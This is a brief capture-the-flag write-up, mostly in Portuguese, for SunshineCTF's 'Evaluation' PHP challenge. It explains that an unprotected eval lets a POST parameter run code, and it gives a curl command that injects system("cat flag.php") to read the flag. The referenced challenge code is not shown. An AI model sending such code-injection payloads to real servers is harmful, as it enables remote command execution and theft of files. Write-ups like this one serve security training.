SunshineCtf - Evaluation Writeup

"Evaluation
Evaluate your life. How are you doing, and are you doing the best you can possibly do? Look deeper within yourself, beyond the obvious. Look at the source of it all.
Also, here's a PHP challenge."

A challenge nós dava o seguinte código:

é notavel o eval desprotegido. Para conseguir a shell, é muito simples, podemos simplesmente adicionar um system() na request para ela ser incluida dentro do eval:
Para conseguir a shell, executei o seguinte comando para incluir o meu system():
$ curl -d 'hello=system("cat flag.php")' -v "http://evaluation.web1.sunshinectf.org/"